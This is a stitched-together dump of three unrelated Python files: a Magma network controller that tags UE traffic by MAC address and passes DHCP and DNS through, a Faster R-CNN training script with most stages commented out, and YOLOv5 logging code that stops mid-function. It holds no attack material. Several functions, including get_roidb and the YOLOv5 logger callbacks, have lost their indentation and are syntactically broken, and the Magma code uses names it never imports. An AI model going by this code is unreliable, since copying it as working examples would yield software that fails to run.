from ryu.ofproto.inet import IPPROTO_TCP, IPPROTO_UDP
from magma.pipelined.app.base import MagmaController, ControllerType
from magma.pipelined.app.inout import INGRESS
from magma.pipelined.directoryd_client import update_record
from magma.pipelined.imsi import encode_imsi, decode_imsi
from magma.pipelined.openflow import flows
from magma.pipelined.openflow.exceptions import MagmaOFError
from magma.pipelined.openflow.magma_match import MagmaMatch
from magma.pipelined.openflow.registers import IMSI_REG, load_passthrough
class UEMacAddressController(MagmaController):
    """
    UE MAC Address Controller

    This controller controls table 0 which is the first table every packet
    touches. It matches on UE MAC address and sets IMSI metadata
    """
    APP_NAME = "ue_mac"
    APP_TYPE = ControllerType.SPECIAL
    # Configuration container for this app.
    UEMacConfig = namedtuple(
        'UEMacConfig',
        ['gre_tunnel_port'],
    )

    def __init__(self, *args, **kwargs):
        super(UEMacAddressController, self).__init__(*args, **kwargs)
        self.config = self._get_config(kwargs['config'])
        self.tbl_num = self._service_manager.get_table_num(self.APP_NAME)
        self.next_table = \
            self._service_manager.get_table_num(INGRESS)
        # Future that resolves to the ARP controller app once it has loaded.
        self.arpd_controller_fut = kwargs['app_futures']['arpd']
        self.arp_contoller = None  # NOTE(review): attribute name carries a historical typo
        self._datapath = None
        # Scratch table used to packet-in downlink DHCP replies so the UE IP
        # can be learned (see _learn_arp_entry).
        self._dhcp_learn_scratch = \
            self._service_manager.allocate_scratch_tables(self.APP_NAME, 1)[0]

    def _get_config(self, config_dict):
        """Parse the service config dict into a UEMacConfig tuple."""
        return self.UEMacConfig(
            # TODO: rename port number to a tunneling protocol agnostic name
            gre_tunnel_port=config_dict['ovs_gtp_port_number'],
        )

    def initialize_on_connect(self, datapath):
        """Clear this app's table and install defaults when the switch connects."""
        flows.delete_all_flows_from_table(datapath,
                                          self._service_manager.get_table_num(
                                              self.APP_NAME))
        self._datapath = datapath
        self._install_default_flows()

    def cleanup_on_disconnect(self, datapath):
        """Remove all of this app's flows when the switch disconnects."""
        flows.delete_all_flows_from_table(datapath,
                                          self._service_manager.get_table_num(
                                              self.APP_NAME))

    def add_ue_mac_flow(self, sid, mac_addr):
        """Install flows tagging traffic to/from *mac_addr* with *sid*'s IMSI.

        Also opens DHCP and DNS passthrough for the UE.
        """
        self._add_dhcp_passthrough_flows(sid, mac_addr)
        self._add_dns_passthrough_flows(sid, mac_addr)
        uplink_match = MagmaMatch(eth_src=mac_addr)
        self._add_resubmit_flow(sid, uplink_match,
                                priority=flows.UE_FLOW_PRIORITY)
        downlink_match = MagmaMatch(eth_dst=mac_addr)
        self._add_resubmit_flow(sid, downlink_match,
                                priority=flows.UE_FLOW_PRIORITY)

    def delete_ue_mac_flow(self, sid, mac_addr):
        """Remove the flows installed by add_ue_mac_flow for this UE."""
        self._delete_dhcp_passthrough_flows(sid, mac_addr)
        self._delete_dns_passthrough_flows(sid, mac_addr)
        uplink_match = MagmaMatch(eth_src=mac_addr)
        self._delete_resubmit_flow(sid, uplink_match)
        downlink_match = MagmaMatch(eth_dst=mac_addr)
        self._delete_resubmit_flow(sid, downlink_match)

    def add_arp_response_flow(self, imsi, yiaddr, chaddr):
        """Program ARP responses for a UE whose IP (yiaddr) was just learned.

        Also records the IMSI -> IP mapping in the directory service on a
        background thread.
        """
        if self.arp_contoller or self.arpd_controller_fut.done():
            if not self.arp_contoller:
                self.arp_contoller = self.arpd_controller_fut.result()
            self.arp_contoller.add_ue_arp_flows(self._datapath,
                                                yiaddr, chaddr)
            self.logger.debug("Learned arp for imsi %s, ip %s", imsi, yiaddr)
            # Associate IMSI to IPv4 addr in directory service
            threading.Thread(target=update_record, args=(str(imsi),
                                                         yiaddr)).start()
        else:
            self.logger.error("ARPD controller not ready, ARP learn FAILED")

    def _add_resubmit_flow(self, sid, match, action=None,
                           priority=flows.DEFAULT_PRIORITY,
                           next_table=None):
        """Install a flow that tags matching packets with *sid*'s IMSI and
        resubmits them to *next_table* (defaults to the ingress table)."""
        parser = self._datapath.ofproto_parser
        if action is None:
            actions = []
        else:
            actions = [action]
        if next_table is None:
            next_table = self.next_table
        # Add IMSI metadata
        actions.append(
            parser.NXActionRegLoad2(dst=IMSI_REG, value=encode_imsi(sid)))
        flows.add_resubmit_next_service_flow(self._datapath, self.tbl_num,
                                             match, actions=actions,
                                             priority=priority,
                                             resubmit_table=next_table)

    def _delete_resubmit_flow(self, sid, match, action=None):
        """Delete a flow previously installed by _add_resubmit_flow."""
        parser = self._datapath.ofproto_parser
        if action is None:
            actions = []
        else:
            actions = [action]
        # Add IMSI metadata (must match the installed flow's actions exactly)
        actions.append(
            parser.NXActionRegLoad2(dst=IMSI_REG, value=encode_imsi(sid)))
        flows.delete_flow(self._datapath, self.tbl_num, match, actions=actions)

    def _add_dns_passthrough_flows(self, sid, mac_addr):
        """Let the UE's DNS traffic (UDP and TCP port 53) bypass enforcement."""
        parser = self._datapath.ofproto_parser
        # Set so packet skips enforcement and send to egress
        action = load_passthrough(parser)
        # Install UDP flows for DNS
        ulink_match_udp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
                                     ip_proto=IPPROTO_UDP,
                                     udp_dst=53,
                                     eth_src=mac_addr)
        self._add_resubmit_flow(sid, ulink_match_udp, action,
                                flows.PASSTHROUGH_PRIORITY)
        dlink_match_udp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
                                     ip_proto=IPPROTO_UDP,
                                     udp_src=53,
                                     eth_dst=mac_addr)
        self._add_resubmit_flow(sid, dlink_match_udp, action,
                                flows.PASSTHROUGH_PRIORITY)
        # Install TCP flows for DNS
        ulink_match_tcp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
                                     ip_proto=IPPROTO_TCP,
                                     tcp_dst=53,
                                     eth_src=mac_addr)
        self._add_resubmit_flow(sid, ulink_match_tcp, action,
                                flows.PASSTHROUGH_PRIORITY)
        dlink_match_tcp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
                                     ip_proto=IPPROTO_TCP,
                                     tcp_src=53,
                                     eth_dst=mac_addr)
        self._add_resubmit_flow(sid, dlink_match_tcp, action,
                                flows.PASSTHROUGH_PRIORITY)

    def _delete_dns_passthrough_flows(self, sid, mac_addr):
        """Remove the DNS passthrough flows installed for this UE."""
        parser = self._datapath.ofproto_parser
        # Set so packet skips enforcement controller
        action = load_passthrough(parser)
        # Delete UDP flows for DNS
        ulink_match_udp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
                                     ip_proto=IPPROTO_UDP,
                                     udp_dst=53,
                                     eth_src=mac_addr)
        self._delete_resubmit_flow(sid, ulink_match_udp, action)
        dlink_match_udp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
                                     ip_proto=IPPROTO_UDP,
                                     udp_src=53,
                                     eth_dst=mac_addr)
        self._delete_resubmit_flow(sid, dlink_match_udp, action)
        # Delete TCP flows for DNS
        ulink_match_tcp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
                                     ip_proto=IPPROTO_TCP,
                                     tcp_dst=53,
                                     eth_src=mac_addr)
        self._delete_resubmit_flow(sid, ulink_match_tcp, action)
        dlink_match_tcp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
                                     ip_proto=IPPROTO_TCP,
                                     tcp_src=53,
                                     eth_dst=mac_addr)
        self._delete_resubmit_flow(sid, dlink_match_tcp, action)

    def _add_dhcp_passthrough_flows(self, sid, mac_addr):
        """Let the UE's DHCP traffic bypass enforcement.

        Downlink DHCP replies are additionally sent to the scratch table,
        which packet-ins them to the controller for IP learning.
        """
        ofproto, parser = self._datapath.ofproto, self._datapath.ofproto_parser
        # Set so packet skips enforcement controller
        action = load_passthrough(parser)
        uplink_match = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
                                  ip_proto=IPPROTO_UDP,
                                  udp_src=68,
                                  udp_dst=67,
                                  eth_src=mac_addr)
        self._add_resubmit_flow(sid, uplink_match, action,
                                flows.PASSTHROUGH_PRIORITY)
        downlink_match = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
                                    ip_proto=IPPROTO_UDP,
                                    udp_src=67,
                                    udp_dst=68,
                                    eth_dst=mac_addr)
        # Set so triggers packetin and we can learn the ip to do arp response
        self._add_resubmit_flow(sid, downlink_match, action,
                                flows.PASSTHROUGH_PRIORITY, next_table=self._dhcp_learn_scratch)
        # Install default flow for dhcp learn scratch
        imsi_match = MagmaMatch(imsi=encode_imsi(sid))
        flows.add_output_flow(self._datapath, self._dhcp_learn_scratch,
                              match=imsi_match, actions=[],
                              priority=flows.PASSTHROUGH_PRIORITY,
                              output_port=ofproto.OFPP_CONTROLLER,
                              copy_table=self.next_table,
                              max_len=ofproto.OFPCML_NO_BUFFER)

    def _delete_dhcp_passthrough_flows(self, sid, mac_addr):
        """Remove the DHCP passthrough and scratch-table flows for this UE."""
        parser = self._datapath.ofproto_parser
        # Set so packet skips enforcement controller
        action = load_passthrough(parser)
        uplink_match = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
                                  ip_proto=IPPROTO_UDP,
                                  udp_src=68,
                                  udp_dst=67,
                                  eth_src=mac_addr)
        self._delete_resubmit_flow(sid, uplink_match, action)
        downlink_match = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
                                    ip_proto=IPPROTO_UDP,
                                    udp_src=67,
                                    udp_dst=68,
                                    eth_dst=mac_addr)
        self._delete_resubmit_flow(sid, downlink_match, action)
        imsi_match = MagmaMatch(imsi=encode_imsi(sid))
        flows.delete_flow(self._datapath, self._dhcp_learn_scratch, imsi_match)

    def _add_uplink_arp_allow_flow(self):
        """Allow uplink ARP packets to continue to the next service table."""
        arp_match = MagmaMatch(eth_type=ether_types.ETH_TYPE_ARP)
        flows.add_resubmit_next_service_flow(self._datapath, self.tbl_num,
                                             arp_match, actions=[],
                                             priority=flows.DEFAULT_PRIORITY,
                                             resubmit_table=self.next_table)

    @set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
    def _learn_arp_entry(self, ev):
        """
        Learn action to process PacketIn DHCP packets, dhcp ack packets will
        be used to learn the ARP entry for the UE to install rules in the arp
        table. The DHCP packets will then be sent through the pipeline.
        """
        msg = ev.msg
        if self._dhcp_learn_scratch != msg.table_id:
            # Intended for other application
            return
        try:
            encoded_imsi = _get_encoded_imsi_from_packetin(msg)
            # Decode the imsi to properly save in directoryd
            imsi = decode_imsi(encoded_imsi)
        except MagmaOFError as e:
            # No packet direction, but intended for this table
            self.logger.error("Error obtaining IMSI from pkt-in: %s", e)
            return
        pkt = packet.Packet(msg.data)
        dhcp_header = pkt.get_protocols(dhcp.dhcp)[0]
        # DHCP yiaddr is the client(UE) ip addr
        # chaddr is the client mac address
        self.add_arp_response_flow(imsi, dhcp_header.yiaddr, dhcp_header.chaddr)

    def _install_default_flows(self):
        """
        Install default flows
        """
        # Allows arp packets from uplink(no eth dst set) to go to the arp table
        self._add_uplink_arp_allow_flow()
        # TODO We might want a default drop all rule with min priority, but
        # adding it breaks all unit tests for this controller(needs work)
def _get_encoded_imsi_from_packetin(msg):
    """Extract the encoded IMSI register value from a Packet-In message.

    Raises:
        MagmaOFError: when the IMSI register is absent from the OF match.
    """
    encoded = msg.match.get(IMSI_REG)
    if encoded is None:
        raise MagmaOFError('IMSI not found in OFPMatch')
    return encoded
|
train_faster_rcnn_alt_opt.py | #!/usr/bin/env python
# --------------------------------------------------------
# Faster R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
"""Train a Faster R-CNN network using alternating optimization.
This tool implements the alternating optimization algorithm described in our
NIPS 2015 paper ("Faster R-CNN: Towards Real-time Object Detection with Region
Proposal Networks." Shaoqing Ren, Kaiming He, Ross Girshick, Jian Sun.)
"""
import _init_paths
from fast_rcnn.train import get_training_roidb, train_net
from fast_rcnn.config import cfg, cfg_from_file, cfg_from_list, get_output_dir
from datasets.factory import get_imdb
from rpn.generate import imdb_proposals
import argparse
import pprint
import numpy as np
import sys, os
import multiprocessing as mp
import cPickle
import shutil
def parse_args(argv=None):
    """Parse command line arguments.

    Args:
        argv: optional list of argument strings; when None (the default,
            preserving the original behavior) the arguments come from
            sys.argv[1:].

    Returns:
        The parsed argparse namespace.
    """
    parser = argparse.ArgumentParser(description='Train a Faster R-CNN network')
    parser.add_argument('--gpu', dest='gpu_id',
                        help='GPU device id to use [0]',
                        default=0, type=int)
    parser.add_argument('--net_name', dest='net_name',
                        help='network name (e.g., "ZF")',
                        default=None, type=str)
    parser.add_argument('--weights', dest='pretrained_model',
                        help='initialize with pretrained model weights',
                        default=None, type=str)
    parser.add_argument('--cfg', dest='cfg_file',
                        help='optional config file',
                        default=None, type=str)
    parser.add_argument('--imdb', dest='imdb_name',
                        help='dataset to train on',
                        default='voc_2007_trainval', type=str)
    parser.add_argument('--set', dest='set_cfgs',
                        help='set config keys', default=None,
                        nargs=argparse.REMAINDER)
    # BUG FIX: help text was a copy-paste of --set's ("set config keys");
    # --final is the path the final trained model is copied to.
    parser.add_argument('--final', dest='final_path',
                        help='path to copy the final trained model to',
                        default=None)

    # Print usage and exit when the script is invoked with no arguments.
    if argv is None and len(sys.argv) == 1:
        parser.print_help()
        sys.exit(1)

    args = parser.parse_args(argv)
    return args
def get_roidb(imdb_name, rpn_file=None):
imdb = get_imdb(imdb_name)
print 'Loaded dataset `{:s}` for training'.format(imdb.name)
imdb.set_proposal_method(cfg.TRAIN.PROPOSAL_METHOD)
print 'Set proposal method: {:s}'.format(cfg.TRAIN.PROPOSAL_METHOD)
if rpn_file is not None:
imdb.config['rpn_file'] = rpn_file
roidb = get_training_roidb(imdb)
return roidb, imdb
def get_solvers(net_name):
    """Return the per-stage training artifacts for *net_name*.

    Returns (solver prototxt paths, per-stage max iterations,
    RPN test prototxt path) for the four alternating-optimization stages.
    """
    # Faster R-CNN Alternating Optimization
    method = 'faster_rcnn_alt_opt'
    # Solver for each training stage
    stage_files = ['stage1_rpn_solver60k80k.pt',
                   'stage1_fast_rcnn_solver30k40k.pt',
                   'stage2_rpn_solver60k80k.pt',
                   'stage2_fast_rcnn_solver30k40k.pt']
    solvers = [os.path.join(cfg.MODELS_DIR, net_name, method, fname)
               for fname in stage_files]
    # Iterations for each training stage
    max_iters = [40000, 20000, 40000, 20000]
    # Test prototxt for the RPN
    rpn_test_prototxt = os.path.join(
        cfg.MODELS_DIR, net_name, method, 'rpn_test.pt')
    return solvers, max_iters, rpn_test_prototxt
# ------------------------------------------------------------------------------
# Pycaffe doesn't reliably free GPU memory when instantiated nets are discarded
# (e.g. "del net" in Python code). To work around this issue, each training
# stage is executed in a separate process using multiprocessing.Process.
# ------------------------------------------------------------------------------
def _init_caffe(cfg):
    """Initialize pycaffe in a training process.

    caffe is imported lazily so each multiprocessing worker creates its own
    GPU context; numpy and caffe RNGs are seeded for reproducibility.
    """
    import caffe
    # fix the random seeds (numpy and caffe) for reproducibility
    np.random.seed(cfg.RNG_SEED)
    caffe.set_random_seed(cfg.RNG_SEED)
    # set up caffe on the configured GPU
    caffe.set_mode_gpu()
    caffe.set_device(cfg.GPU_ID)
def train_rpn(queue=None, imdb_name=None, init_model=None, solver=None,
              max_iters=None, cfg=None):
    """Train a Region Proposal Network in a separate training process.

    Intended as a multiprocessing.Process target; the path of the final
    snapshot is sent back to the parent through *queue*.
    """
    # Not using any proposals, just ground-truth boxes
    cfg.TRAIN.HAS_RPN = True
    cfg.TRAIN.BBOX_REG = False # applies only to Fast R-CNN bbox regression
    cfg.TRAIN.PROPOSAL_METHOD = 'gt'
    cfg.TRAIN.IMS_PER_BATCH = 1
    print 'Init model: {}'.format(init_model)
    print('Using config:')
    pprint.pprint(cfg)
    # Import caffe here so this worker process gets its own GPU context.
    import caffe
    _init_caffe(cfg)
    roidb, imdb = get_roidb(imdb_name)
    print 'roidb len: {}'.format(len(roidb))
    output_dir = get_output_dir(imdb)
    print 'Output will be saved to `{:s}`'.format(output_dir)
    model_paths = train_net(solver, roidb, output_dir,
                            pretrained_model=init_model,
                            max_iters=max_iters)
    # Cleanup all but the final model
    for i in model_paths[:-1]:
        os.remove(i)
    rpn_model_path = model_paths[-1]
    # Send final model path through the multiprocessing queue
    queue.put({'model_path': rpn_model_path})
def rpn_generate(queue=None, imdb_name=None, rpn_model_path=None, cfg=None,
                 rpn_test_prototxt=None):
    """Use a trained RPN to generate proposals.

    Runs as a multiprocessing.Process target; the pickle path holding the
    generated proposals is sent back to the parent through *queue*.
    """
    cfg.TEST.RPN_PRE_NMS_TOP_N = -1 # no pre NMS filtering
    cfg.TEST.RPN_POST_NMS_TOP_N = 2000 # limit top boxes after NMS
    print 'RPN model: {}'.format(rpn_model_path)
    print('Using config:')
    pprint.pprint(cfg)
    # Import caffe here so this worker process gets its own GPU context.
    import caffe
    _init_caffe(cfg)
    # NOTE: the matlab implementation computes proposals on flipped images, too.
    # We compute them on the image once and then flip the already computed
    # proposals. This might cause a minor loss in mAP (less proposal jittering).
    imdb = get_imdb(imdb_name)
    print 'Loaded dataset `{:s}` for proposal generation'.format(imdb.name)
    # Load RPN and configure output directory
    rpn_net = caffe.Net(rpn_test_prototxt, rpn_model_path, caffe.TEST)
    output_dir = get_output_dir(imdb)
    print 'Output will be saved to `{:s}`'.format(output_dir)
    # Generate proposals on the imdb
    rpn_proposals = imdb_proposals(rpn_net, imdb)
    # Write proposals to disk and send the proposal file path through the
    # multiprocessing queue
    rpn_net_name = os.path.splitext(os.path.basename(rpn_model_path))[0]
    rpn_proposals_path = os.path.join(
        output_dir, rpn_net_name + '_proposals.pkl')
    with open(rpn_proposals_path, 'wb') as f:
        cPickle.dump(rpn_proposals, f, cPickle.HIGHEST_PROTOCOL)
    print 'Wrote RPN proposals to {}'.format(rpn_proposals_path)
    queue.put({'proposal_path': rpn_proposals_path})
def train_fast_rcnn(queue=None, imdb_name=None, init_model=None, solver=None,
                    max_iters=None, cfg=None, rpn_file=None):
    """Train a Fast R-CNN using proposals generated by an RPN.

    Runs as a multiprocessing.Process target; the final model path is sent
    back to the parent through *queue*.
    """
    cfg.TRAIN.HAS_RPN = False # not generating proposals on-the-fly
    cfg.TRAIN.PROPOSAL_METHOD = 'rpn' # use pre-computed RPN proposals instead
    cfg.TRAIN.IMS_PER_BATCH = 2
    print 'Init model: {}'.format(init_model)
    print 'RPN proposals: {}'.format(rpn_file)
    print('Using config:')
    pprint.pprint(cfg)
    # Import caffe here so this worker process gets its own GPU context.
    import caffe
    _init_caffe(cfg)
    roidb, imdb = get_roidb(imdb_name, rpn_file=rpn_file)
    output_dir = get_output_dir(imdb)
    print 'Output will be saved to `{:s}`'.format(output_dir)
    # Train Fast R-CNN
    model_paths = train_net(solver, roidb, output_dir,
                            pretrained_model=init_model,
                            max_iters=max_iters)
    # Cleanup all but the final model
    for i in model_paths[:-1]:
        os.remove(i)
    fast_rcnn_model_path = model_paths[-1]
    # Send Fast R-CNN model path over the multiprocessing queue
    queue.put({'model_path': fast_rcnn_model_path})
if __name__ == '__main__':
    args = parse_args()
    print('Called with args:')
    print(args)
    if args.cfg_file is not None:
        cfg_from_file(args.cfg_file)
    if args.set_cfgs is not None:
        cfg_from_list(args.set_cfgs)
    cfg.GPU_ID = args.gpu_id
    # --------------------------------------------------------------------------
    # Pycaffe doesn't reliably free GPU memory when instantiated nets are
    # discarded (e.g. "del net" in Python code). To work around this issue, each
    # training stage is executed in a separate process using
    # multiprocessing.Process.
    # --------------------------------------------------------------------------
    # queue for communicated results between processes
    mp_queue = mp.Queue()
    # solvers, iters, etc. for each training stage
    solvers, max_iters, rpn_test_prototxt = get_solvers(args.net_name)
    # NOTE(review): stages 1 and 2 below are largely commented out; their
    # outputs are replaced with hard-coded paths to previously computed
    # proposals/models, so only the final Fast R-CNN stage actually runs.
    print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
    print 'Stage 1 RPN, init from ImageNet model'
    print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
    cfg.TRAIN.SNAPSHOT_INFIX = 'stage1'
    mp_kwargs = dict(
        queue=mp_queue,
        imdb_name=args.imdb_name,
        init_model=args.pretrained_model,
        solver=solvers[0],
        max_iters=max_iters[0],
        cfg=cfg)
    #p = mp.Process(target=train_rpn, kwargs=mp_kwargs)
    #p.start()
    #rpn_stage1_out = mp_queue.get()
    #p.join()
    print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
    print 'Stage 1 RPN, generate proposals'
    print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
    #mp_kwargs = dict(
    #        queue=mp_queue,
    #        imdb_name=args.imdb_name,
    #        rpn_model_path=str(rpn_stage1_out['model_path']),
    #        cfg=cfg,
    #        rpn_test_prototxt=rpn_test_prototxt)
    #p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
    #p.start()
    # Reuse previously generated stage-1 proposals instead of recomputing.
    rpn_stage1_out = {}
    rpn_stage1_out['proposal_path'] = 'output/default/train/vgg_cnn_m_1024_rpn_stage1_iter_40000_proposals.pkl'#mp_queue.get()['proposal_path']
    #p.join()
    print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
    print 'Stage 1 Fast R-CNN using RPN proposals, init from ImageNet model'
    print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
    cfg.TRAIN.SNAPSHOT_INFIX = 'stage1'
    #mp_kwargs = dict(
    #        queue=mp_queue,
    #        imdb_name=args.imdb_name,
    #        init_model=args.pretrained_model,
    #        solver=solvers[1],
    #        max_iters=max_iters[1],
    #        cfg=cfg,
    #        rpn_file=rpn_stage1_out['proposal_path'])
    #p = mp.Process(target=train_fast_rcnn, kwargs=mp_kwargs)
    #p.start()
    #fast_rcnn_stage1_out = mp_queue.get()
    #p.join()
    #print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
    #print 'Stage 2 RPN, init from stage 1 Fast R-CNN model'
    #print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
    #cfg.TRAIN.SNAPSHOT_INFIX = 'stage2'
    #mp_kwargs = dict(
    #        queue=mp_queue,
    #        imdb_name=args.imdb_name,
    #        init_model=str(fast_rcnn_stage1_out['model_path']),
    #        solver=solvers[2],
    #        max_iters=max_iters[2],
    #        cfg=cfg)
    #p = mp.Process(target=train_rpn, kwargs=mp_kwargs)
    #p.start()
    #rpn_stage2_out = mp_queue.get()
    #p.join()
    #print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
    #print 'Stage 2 RPN, generate proposals'
    #print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
    #mp_kwargs = dict(
    #        queue=mp_queue,
    #        imdb_name=args.imdb_name,
    #        rpn_model_path=str(rpn_stage2_out['model_path']),
    #        cfg=cfg,
    #        rpn_test_prototxt=rpn_test_prototxt)
    #p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
    #p.start()
    # Reuse the stage-1 proposals and model as the "stage 2" inputs.
    rpn_stage2_out = {}
    rpn_stage2_out['proposal_path'] = 'output/default/train/vgg_cnn_m_1024_rpn_stage1_iter_40000_proposals.pkl'#mp_queue.get()['proposal_path']
    rpn_stage2_out['model_path'] = 'output/default/train/vgg_cnn_m_1024_rpn_stage1_iter_40000.caffemodel'
    #p.join()
    print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
    print 'Stage 2 Fast R-CNN, init from stage 2 RPN R-CNN model'
    print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
    cfg.TRAIN.SNAPSHOT_INFIX = 'stage2'
    mp_kwargs = dict(
        queue=mp_queue,
        imdb_name=args.imdb_name,
        init_model=str(rpn_stage2_out['model_path']),
        solver=solvers[3],
        max_iters=max_iters[3],
        cfg=cfg,
        rpn_file=rpn_stage2_out['proposal_path'])
    p = mp.Process(target=train_fast_rcnn, kwargs=mp_kwargs)
    p.start()
    fast_rcnn_stage2_out = mp_queue.get()
    p.join()
    # Create final model (just a copy of the last stage)
    final_path = args.final_path
    print 'cp {} -> {}'.format(
        fast_rcnn_stage2_out['model_path'], final_path)
    shutil.copy(fast_rcnn_stage2_out['model_path'], final_path)
    print 'Final model: {}'.format(final_path)
|
__init__.py | # YOLOv5 🚀 by Ultralytics, GPL-3.0 license
"""
Logging utils
"""
import os
import warnings
from threading import Thread
import pkg_resources as pkg
import torch
from torch.utils.tensorboard import SummaryWriter
from yolov5_master.utils.general import colorstr, emojis
from yolov5_master.utils.loggers.wandb.wandb_utils import WandbLogger
from yolov5_master.utils.plots import plot_images, plot_results
from yolov5_master.utils.torch_utils import de_parallel
LOGGERS = ('csv', 'tb', 'wandb')  # text-file, TensorBoard, Weights & Biases
RANK = int(os.getenv('RANK', -1))  # DDP process rank; -1 when not distributed
# Try to enable Weights & Biases: the package must be genuinely installed
# (not shadowed by a local dir), recent enough, and only the main process
# (rank 0 or -1) attempts a login. Any failure sets wandb to None so the
# rest of the module degrades gracefully.
try:
    import wandb
    assert hasattr(wandb, '__version__')  # verify package import not local dir
    if pkg.parse_version(wandb.__version__) >= pkg.parse_version('0.12.2') and RANK in [0, -1]:
        try:
            wandb_login_success = wandb.login(timeout=30)
        except wandb.errors.UsageError:  # known non-TTY terminal issue
            wandb_login_success = False
        if not wandb_login_success:
            wandb = None
except (ImportError, AssertionError):
    wandb = None
class Loggers():
# YOLOv5 Loggers class
    def __init__(self, save_dir=None, weights=None, opt=None, hyp=None, logger=None, include=LOGGERS):
        """Set up the requested loggers (csv is always on; TensorBoard and
        W&B are optional).

        save_dir: run directory that plots/results are written to
        weights: checkpoint path, used to recover a W&B run id on resume
        opt: namespace of training options
        hyp: hyperparameter dict, forwarded to W&B
        logger: logging.Logger used for console messages
        include: subset of LOGGERS to activate
        """
        self.save_dir = save_dir
        self.weights = weights
        self.opt = opt
        self.hyp = hyp
        self.logger = logger  # for printing results to console
        self.include = include
        # Metric names, in the order values arrive in on_fit_epoch_end().
        self.keys = ['train/box_loss', 'train/obj_loss', 'train/cls_loss',  # train loss
                     'metrics/precision', 'metrics/recall', 'metrics/mAP_0.5', 'metrics/mAP_0.5:0.95',  # metrics
                     'val/box_loss', 'val/obj_loss', 'val/cls_loss',  # val loss
                     'x/lr0', 'x/lr1', 'x/lr2']  # params
        self.best_keys = ['best/epoch', 'best/precision', 'best/recall', 'best/mAP_0.5', 'best/mAP_0.5:0.95',]
        for k in LOGGERS:
            setattr(self, k, None)  # init empty logger dictionary
        self.csv = True  # always log to csv
        # Message
        if not wandb:
            prefix = colorstr('Weights & Biases: ')
            s = f"{prefix}run 'pip install wandb' to automatically track and visualize YOLOv5 🚀 runs (RECOMMENDED)"
            print(emojis(s))
        # TensorBoard
        s = self.save_dir
        if 'tb' in self.include and not self.opt.evolve:
            prefix = colorstr('TensorBoard: ')
            self.logger.info(f"{prefix}Start with 'tensorboard --logdir {s.parent}', view at http://localhost:6006/")
            self.tb = SummaryWriter(str(s))
        # W&B
        if wandb and 'wandb' in self.include:
            # Resuming from a wandb artifact needs no locally stored run id.
            wandb_artifact_resume = isinstance(self.opt.resume, str) and self.opt.resume.startswith('wandb-artifact://')
            run_id = torch.load(self.weights).get('wandb_id') if self.opt.resume and not wandb_artifact_resume else None
            self.opt.hyp = self.hyp  # add hyperparameters
            self.wandb = WandbLogger(self.opt, run_id)
        else:
            self.wandb = None
def on_pretrain_routine_end(self):
# Callback runs on pre-train routine end
paths = self.save_dir.glob('*labels*.jpg') # training labels
if self.wandb:
self.wandb.log({"Labels": [wandb.Image(str(x), caption=x.name) for x in paths]})
def on_train_batch_end(self, ni, model, imgs, targets, paths, plots, sync_bn):
# Callback runs on train batch end
if plots:
if ni == 0:
if not sync_bn: # tb.add_graph() --sync known issue https://github.com/ultralytics/yolov5/issues/3754
with warnings.catch_warnings():
warnings.simplefilter('ignore') # suppress jit trace warning
self.tb.add_graph(torch.jit.trace(de_parallel(model), imgs[0:1], strict=False), [])
if ni < 3:
f = self.save_dir / f'train_batch{ni}.jpg' # filename
Thread(target=plot_images, args=(imgs, targets, paths, f), daemon=True).start()
if self.wandb and ni == 10:
files = sorted(self.save_dir.glob('train*.jpg'))
self.wandb.log({'Mosaics': [wandb.Image(str(f), caption=f.name) for f in files if f.exists()]})
def on_train_epoch_end(self, epoch):
    """Keep the W&B logger's epoch counter in sync (1-based) with training."""
    if not self.wandb:
        return
    self.wandb.current_epoch = epoch + 1
def on_val_image_end(self, pred, predn, path, names, im):
    """Forward a single validation image and its predictions to the W&B logger."""
    if not self.wandb:
        return
    self.wandb.val_one_image(pred, predn, path, names, im)
def on_val_end(self):
    """Log every 'val*.jpg' plot produced during validation to W&B."""
    if not self.wandb:
        return
    val_plots = sorted(self.save_dir.glob('val*.jpg'))
    self.wandb.log({"Validation": [wandb.Image(str(p), caption=p.name) for p in val_plots]})
def on_fit_epoch_end(self, vals, epoch, best_fitness, fi):
    """Persist the per-epoch metrics (train+val) to CSV, TensorBoard and W&B.

    vals: metric values aligned with self.keys; fi: current fitness,
    compared against best_fitness to detect a new best epoch.
    """
    metrics = dict(zip(self.keys, vals))
    if self.csv:
